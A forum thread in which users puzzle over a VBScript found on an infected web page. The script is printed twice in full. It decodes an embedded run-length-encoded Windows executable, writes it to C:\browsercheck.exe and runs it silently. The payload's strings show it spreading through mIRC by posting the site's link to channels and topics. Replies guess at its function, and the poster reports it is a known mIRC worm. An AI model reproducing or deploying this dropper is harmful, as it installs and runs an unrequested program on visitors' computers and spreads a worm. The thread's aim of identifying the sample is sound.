New Virus

[Falcon21]

From the virus-infected website http://www.kromberg.at/[removed]/show.php?
f=drunkchicks.jpg :

<script language=vbs>
self.MoveTo 5000,5000
dim v(23)
v(0)="4d,5a,90,y,03,y3,04,y3,z2,y2,b8,y7,40,y23,c8,y3,0e,1f,ba,0e,y,b4,09,cd,21,b8,01,4c,cd,21,54,68,69,73,20,70,72,6f,67,72,61,6d,20,63,61,6e2,6f,74,20,62,65,20,72,75,6e,20,69,6e,20,44"
v(1)=",4f,53,20,6d,6f,64,65,2e,0d2,0a,24,y7,37,de,56,d8,73,bf,38,8b,73,bf,38,8b,73,bf,38,8b,2c,9d,33,8b,70,bf,38,8b,73,bf,39,8b,62,bf,38,8b,11,a0,2b,8b,76,bf,38,8b,75,9c,33,8b,71,bf,38,8b"
v(2)=",52,69,63,68,73,bf,38,8b,y10,50,45,y2,4c,01,03,y,53,94,75,3f,y8,e0,y,0f,01,0b,01,06,y2,04,y3,06,y6,54,11,y3,10,y3,20,y4,40,y2,10,y3,02,y2,04,y7,04,y8,40,y3,04,y2,54,fe,y2,02,y5,10"
v(3)=",y2,10,y4,10,y2,10,y6,10,yb,48,20,y2,3c,y54,20,y2,48,y1b,2e,74,65,78,74,y3,4d,02,y3,10,y3,04,y3,04,ye,20,y2,60,2e,72,64,61,74,61,y2,10,02,y3,20,y3,04,y3,08,ye,40,y2,40,2e,64,61,74,61"
v(4)=",y3,0c,01,y3,30,y3,02,y3,0c,ye,40,y2,c0,y1c8,55,8b,ec,83,ec,30,53,56,57,6a,08,59,33,c0,8d,7d,d4,33,f6,f3,ab,56,68,y,c0,18,y,8d,45,fc,bf,ec,03,y2,56,50,c7,45,d0,24,y3,89,7d,dc,89,75"
v(5)=",fc,e8,17,01,y2,39,75,fc,0f,84,cf,y3,57,68,f8,30,40,y,z,75,fc,e8,fa,y3,3b,c6,89,45,f8,75,03,56,eb,63,57,68,f0,30,40,y,z,75,fc,e8,e2,y3,8b,d8,3b,de,74,4c,ba,08,30,40,y,83,c9,z"
v(6)=",8b,fa,33,c0,f2,ae,6a,01,6a,01,53,56,f7,d1,51,52,z,75,fc,e8,b6,y3,8b,f8,3b,fe,74,1d,8d,45,d0,50,53,z,75,f8,z,75,fc,e8,9a,y3,3b,c6,89,45,f4,75,1c,57,e8,87,y3,53,z,75,fc,e8,78,y3"
v(7)=",z,75,f8,z,75,fc,e8,6d,y3,eb,4a,56,6a,64,68,90,40,y2,6a,01,53,50,6a,z,57,e8,51,y3,z,75,f4,e8,43,y3,57,e8,4f,y3,53,z,75,fc,e8,40,y3,z,75,f8,z,75,fc,e8,35,y3,6a,02,562,z,75,fc"
v(8)=",e8,17,y3,z,75,fc,e8,09,y3,5f,5e,33,c0,5b,c9,c2,10,y,z,25,3c,20,40,y,z,25,2c,20,40,y,z,25,34,20,40,y,z,25,30,20,40,y,z,25,1c,20,40,y,z,25,28,20,40,y,z,25,24,20,40,y"
v(9)=",z,25,202,40,y,z,25,38,20,40,y,z,25,40,20,40,y,55,8b,ec,83,ec,44,56,z,15,04,20,40,y,8b,f0,8a,06,3c,22,75,14,3c,22,74,08,8a,46,01,46,84,c0,75,f4,80,3e,22,75,0d,46,eb,0a,3c,20"
v(10)=",7e,06,46,80,3e,20,7f,fa,8a,06,84,c0,74,04,3c,20,7e,e9,83,65,e8,y,8d,45,bc,50,z,15,08,20,40,y,e8,5b,y3,68,04,30,40,y,68,y,30,40,y,e8,32,y3,f6,45,e8,01,592,74,06,0f,b7,45,ec,eb"
v(11)=",03,6a,0a,58,50,56,6a,y,6a,y,z,15,14,20,40,y,50,e8,2a,fe,z2,8b,f0,e8,3a,y3,56,z,15,0c,20,40,y,5e,56,8b,74,24,08,3b,74,24,0c,73,0d,8b,06,85,c0,74,02,z,d0,83,c6,04,eb,ed,5e,c3"
v(12)=",6a,20,58,6a,04,50,a3,04,31,40,y,e8,24,y3,59,a3,y,31,40,y,59,c3,8b,0d,08,31,40,y,85,c9,74,11,a1,y,31,40,y,8d,0c,88,51,50,e8,b5,z3,592,c3,8b,44,24,04,0f,af,44,24,08,50,6a,08,z"
v(13)=",15,y,20,40,y,50,z,15,10,20,40,y,c3,y1b3,f0,21,y2,d2,21,y2,c0,21,y2,9e,21,y2,e4,21,y2,ac,21,y6,18,21,y2,50,21,y2,42,21,y2,2e,21,y2,de,20,y3,21,y2,f0,20,y2,66,21,y2,cc,20,y2,80,21"
v(14)=",y6,a0,20,ya,92,21,y2,1c,20,y2,84,20,ya,02,22,y3,20,y16,f0,21,y2,d2,21,y2,c0,21,y2,9e,21,y2,e4,21,y2,ac,21,y6,18,21,y2,50,21,y2,42,21,y2,2e,21,y2,de,20,y3,21,y2,f0,20,y2,66,21,y2,cc"
v(15)=",20,y2,80,21,y6,7d,y,44,64,65,55,6e,69,6e,69,74,69,61,6c,69,7a,65,y,73,y,44,64,65,4e,61,6d,65,53,65,72,76,69,63,65,y2,67,y,44,64,65,44,69,73,63,6f,6e2,65,63,74,y,60,y,44,64,65"
v(16)=",43,6c,69,65,6e,74,54,72,61,6e,73,61,63,74,69,6f,6e,y2,6b,y,44,64,65,46,72,652,53,74,72,69,6e,67,48,61,6e,64,6c,65,y,6a,y,44,64,65,46,72,652,44,61,74,61,48,61,6e,64,6c,65,y,62,y"
v(17)=",44,64,65,43,6f,6e2,65,63,74,y2,64,y,44,64,65,43,72,65,61,74,65,44,61,74,61,48,61,6e,64,6c,65,y,65,y,44,64,65,43,72,65,61,74,65,53,74,72,69,6e,67,48,61,6e,64,6c,65,41,y2,70,y,44"
v(18)=",64,65,49,6e,69,74,69,61,6c,69,7a,65,41,y2,55,53,45,52,33,32,2e,64,6c2,y2,7d,y,45,78,69,74,50,72,6f,63,65,732,y,26,01,47,65,74,4d,6f,64,75,6c,65,48,61,6e,64,6c,65,41,y2,50,01,47,65"
v(19)=",74,53,74,61,72,74,75,70,49,6e,66,6f,41,y,ca,y,47,65,74,43,6f,6d2,61,6e,64,4c,69,6e,65,41,y,99,01,48,65,61,70,41,6c2,6f,63,y,40,01,47,65,74,50,72,6f,63,65,732,48,65,61,70,y2,4b,45"
v(20)=",52,4e,45,4c,33,32,2e,64,6c2,y1fa,2f,61,6d,73,67,20,68,742,70,3a,2f2,773,2e,6b,72,6f,6d,62,65,72,67,2e,61,74,2f,70,69,63,73,2f,73,68,6f,77,2e,70,68,70,3f,66,3d,64,72,75,6e,6b,63,68,69,63"
v(21)=",6b,73,2e,6a,70,67,20,4c,4f,4c,20,7c,20,2f2,74,6f,70,69,63,20,24,63,68,61,6e,28,31,29,20,68,742,70,3a,2f2,773,2e,6b,72,6f,6d,62,65,72,67,2e,61,74,2f,70,69,63,73,2f,73,68,6f,77,2e,70,68"
v(22)=",70,3f,66,3d,64,72,75,6e,6b,63,68,69,63,6b,73,2e,6a,70,67,20,7c,20,2f2,74,6f,70,69,63,20,24,63,68,61,6e,28,32,29,20,68,742,70,3a,2f2,773,2e,6b,72,6f,6d,62,65,72,67,2e,61,74,2f,70,69,63"
v(23)=",73,2f,73,68,6f,77,2e,70,68,70,3f,66,3d,64,72,75,6e,6b,63,68,69,63,6b,73,2e,6a,70,67,20,7c,20,2f2,6d,6f,64,65,20,24,6d,65,20,2b,72,y4,43,4f,4d2,41,4e,44,y,6d,49,52,43,y104"

function res(x,y)
For k = 0 To UBound(v)
v(k) = Replace(v(k), x, y)
Next
End Function
res "z", "ff"
res "y", "00"
For m = 0 To UBound(v)
it = it & v(m)
Next
tmp = Split(it, ",")
Set WshShell = CreateObject("WScript.Shell")
Set WshEnv = WshShell.Environment("Process")
pth = WshEnv("HOMEDRIVE") & WshEnv("HOMEPATH") & "\browsercheck.exe"
pth = "C:\browsercheck.exe"

Set fso = CreateObject("Scripting.FileSystemObject")

Set f = fso.CreateTextFile(pth, True)
For i = 0 To UBound(tmp)
l = Len(tmp(i))
b = Int("&H" & Left(tmp(i), 2))
If l > 2 Then
r = Int("&H" & Mid(tmp(i), 3, l-2))
For j = 1 To r
f.Write Chr(b)
Next
Else
f.Write Chr(b)
End If
Next
f.Close
WshShell.run("""" & pth & """")

</script>

[spools.exe]

self.MoveTo 5000,5000
dim v(23)
v(0)=" 4d,5a,90,y,03,y3,04,y3,z2,y2,b8,y7,40,y23,c8,y3,0e
,1f,ba,0e,y,b4,09,cd,21,b8,01,4c,cd,21,54,68,69,73
,20,70,72,6f,67,72,61,6d,20,63,61,6e2,6f,74,20,62,
65,20,72,75,6e,20,69,6e,20,44"
v(1)=" ,4f,53,20,6d,6f,64,65,2e,0d2,0a,24,y7,37,de,56,d8,
73,bf,38,8b,73,bf,38,8b,73,bf,38,8b,2c,9d,33,8b,70
,bf,38,8b,73,bf,39,8b,62,bf,38,8b,11,a0,2b,8b,76,b
f,38,8b,75,9c,33,8b,71,bf,38,8b"
v(2)=" ,52,69,63,68,73,bf,38,8b,y10,50,45,y2,4c,01,03,y,5
3,94,75,3f,y8,e0,y,0f,01,0b,01,06,y2,04,y3,06,y6,5
4,11,y3,10,y3,20,y4,40,y2,10,y3,02,y2,04,y7,04,y8,
40,y3,04,y2,54,fe,y2,02,y5,10"
v(3)=" ,y2,10,y4,10,y2,10,y6,10,yb,48,20,y2,3c,y54,20,y2,
48,y1b,2e,74,65,78,74,y3,4d,02,y3,10,y3,04,y3,04,y
e,20,y2,60,2e,72,64,61,74,61,y2,10,02,y3,20,y3,04,
y3,08,ye,40,y2,40,2e,64,61,74,61"
v(4)=" ,y3,0c,01,y3,30,y3,02,y3,0c,ye,40,y2,c0,y1c8,55,8b
,ec,83,ec,30,53,56,57,6a,08,59,33,c0,8d,7d,d4,33,f
6,f3,ab,56,68,y,c0,18,y,8d,45,fc,bf,ec,03,y2,56,50
,c7,45,d0,24,y3,89,7d,dc,89,75"
v(5)=" ,fc,e8,17,01,y2,39,75,fc,0f,84,cf,y3,57,68,f8,30,4
0,y,z,75,fc,e8,fa,y3,3b,c6,89,45,f8,75,03,56,eb,63
,57,68,f0,30,40,y,z,75,fc,e8,e2,y3,8b,d8,3b,de,74,
4c,ba,08,30,40,y,83,c9,z"
v(6)=" ,8b,fa,33,c0,f2,ae,6a,01,6a,01,53,56,f7,d1,51,52,z
,75,fc,e8,b6,y3,8b,f8,3b,fe,74,1d,8d,45,d0,50,53,z
,75,f8,z,75,fc,e8,9a,y3,3b,c6,89,45,f4,75,1c,57,e8
,87,y3,53,z,75,fc,e8,78,y3"
v(7)=" ,z,75,f8,z,75,fc,e8,6d,y3,eb,4a,56,6a,64,68,90,40,
y2,6a,01,53,50,6a,z,57,e8,51,y3,z,75,f4,e8,43,y3,5
7,e8,4f,y3,53,z,75,fc,e8,40,y3,z,75,f8,z,75,fc,e8,
35,y3,6a,02,562,z,75,fc"
v(8)=" ,e8,17,y3,z,75,fc,e8,09,y3,5f,5e,33,c0,5b,c9,c2,10
,y,z,25,3c,20,40,y,z,25,2c,20,40,y,z,25,34,20,40,y
,z,25,30,20,40,y,z,25,1c,20,40,y,z,25,28,20,40,y,z
,25,24,20,40,y"
v(9)=" ,z,25,202,40,y,z,25,38,20,40,y,z,25,40,20,40,y,55,
8b,ec,83,ec,44,56,z,15,04,20,40,y,8b,f0,8a,06,3c,2
2,75,14,3c,22,74,08,8a,46,01,46,84,c0,75,f4,80,3e,
22,75,0d,46,eb,0a,3c,20"
v(10)=" ,7e,06,46,80,3e,20,7f,fa,8a,06,84,c0,74,04,3c,20,7
e,e9,83,65,e8,y,8d,45,bc,50,z,15,08,20,40,y,e8,5b,
y3,68,04,30,40,y,68,y,30,40,y,e8,32,y3,f6,45,e8,01
,592,74,06,0f,b7,45,ec,eb"
v(11)=" ,03,6a,0a,58,50,56,6a,y,6a,y,z,15,14,20,40,y,50,e8
,2a,fe,z2,8b,f0,e8,3a,y3,56,z,15,0c,20,40,y,5e,56,
8b,74,24,08,3b,74,24,0c,73,0d,8b,06,85,c0,74,02,z,
d0,83,c6,04,eb,ed,5e,c3"
v(12)=" ,6a,20,58,6a,04,50,a3,04,31,40,y,e8,24,y3,59,a3,y,
31,40,y,59,c3,8b,0d,08,31,40,y,85,c9,74,11,a1,y,31
,40,y,8d,0c,88,51,50,e8,b5,z3,592,c3,8b,44,24,04,0
f,af,44,24,08,50,6a,08,z"
v(13)=" ,15,y,20,40,y,50,z,15,10,20,40,y,c3,y1b3,f0,21,y2,
d2,21,y2,c0,21,y2,9e,21,y2,e4,21,y2,ac,21,y6,18,21
,y2,50,21,y2,42,21,y2,2e,21,y2,de,20,y3,21,y2,f0,2
0,y2,66,21,y2,cc,20,y2,80,21"
v(14)=" ,y6,a0,20,ya,92,21,y2,1c,20,y2,84,20,ya,02,22,y3,2
0,y16,f0,21,y2,d2,21,y2,c0,21,y2,9e,21,y2,e4,21,y2
,ac,21,y6,18,21,y2,50,21,y2,42,21,y2,2e,21,y2,de,2
0,y3,21,y2,f0,20,y2,66,21,y2,cc"
v(15)=" ,20,y2,80,21,y6,7d,y,44,64,65,55,6e,69,6e,69,74,69
,61,6c,69,7a,65,y,73,y,44,64,65,4e,61,6d,65,53,65,
72,76,69,63,65,y2,67,y,44,64,65,44,69,73,63,6f,6e2
,65,63,74,y,60,y,44,64,65"
v(16)=" ,43,6c,69,65,6e,74,54,72,61,6e,73,61,63,74,69,6f,6
e,y2,6b,y,44,64,65,46,72,652,53,74,72,69,6e,67,48,
61,6e,64,6c,65,y,6a,y,44,64,65,46,72,652,44,61,74,
61,48,61,6e,64,6c,65,y,62,y"
v(17)=" ,44,64,65,43,6f,6e2,65,63,74,y2,64,y,44,64,65,43,7
2,65,61,74,65,44,61,74,61,48,61,6e,64,6c,65,y,65,y
,44,64,65,43,72,65,61,74,65,53,74,72,69,6e,67,48,6
1,6e,64,6c,65,41,y2,70,y,44"
v(18)=" ,64,65,49,6e,69,74,69,61,6c,69,7a,65,41,y2,55,53,4
5,52,33,32,2e,64,6c2,y2,7d,y,45,78,69,74,50,72,6f,
63,65,732,y,26,01,47,65,74,4d,6f,64,75,6c,65,48,61
,6e,64,6c,65,41,y2,50,01,47,65"
v(19)=" ,74,53,74,61,72,74,75,70,49,6e,66,6f,41,y,ca,y,47,
65,74,43,6f,6d2,61,6e,64,4c,69,6e,65,41,y,99,01,48
,65,61,70,41,6c2,6f,63,y,40,01,47,65,74,50,72,6f,6
3,65,732,48,65,61,70,y2,4b,45"
v(20)=" ,52,4e,45,4c,33,32,2e,64,6c2,y1fa,2f,61,6d,73,67,2
0,68,742,70,3a,2f2,773,2e,6b,72,6f,6d,62,65,72,67,
2e,61,74,2f,70,69,63,73,2f,73,68,6f,77,2e,70,68,70
,3f,66,3d,64,72,75,6e,6b,63,68,69,63"
v(21)=" ,6b,73,2e,6a,70,67,20,4c,4f,4c,20,7c,20,2f2,74,6f,
70,69,63,20,24,63,68,61,6e,28,31,29,20,68,742,70,3
a,2f2,773,2e,6b,72,6f,6d,62,65,72,67,2e,61,74,2f,7
0,69,63,73,2f,73,68,6f,77,2e,70,68"
v(22)=" ,70,3f,66,3d,64,72,75,6e,6b,63,68,69,63,6b,73,2e,6
a,70,67,20,7c,20,2f2,74,6f,70,69,63,20,24,63,68,61
,6e,28,32,29,20,68,742,70,3a,2f2,773,2e,6b,72,6f,6
d,62,65,72,67,2e,61,74,2f,70,69,63"
v(23)=" ,73,2f,73,68,6f,77,2e,70,68,70,3f,66,3d,64,72,75,6
e,6b,63,68,69,63,6b,73,2e,6a,70,67,20,7c,20,2f2,6d
,6f,64,65,20,24,6d,65,20,2b,72,y4,43,4f,4d2,41,4e,
44,y,6d,49,52,43,y104"

What Language Is That? HEX?

[nihil]

Hi falcon,

Looks like VB6, compressed?

Sorry..............not a lot of help there

Cheers

[spools.exe]

I see how that Works... It takes the big string(Source Code of a file) at the the top puts it all in a variable. Creates a shell of a file called browsercheck.exe and injects the code into it. I've never seend a source code like that before. I'm thinking that its hex. I don't think it can be binary.

[rapier57]

Well, it is a combination of binary and some variables: ysomething, zsomething. Tried to do some deconstruction to see if there is a pattern or anything meaningful. No luck.

But, yeah, it looks a VB Script that injects something into the browser to replace favorites or default home pages.

If this was found on a specific web site, it might be a good idea to block that domain and/or IP as a self-preservation action.

[tekno]

see what happens when you look at pr0n

[Falcon21]

Thanks for all the replies, I have already found the info: http://www.f-secure.com/v-descs/kromber.shtml

This is a harmless mIRC worm. The virus website have already been taken down.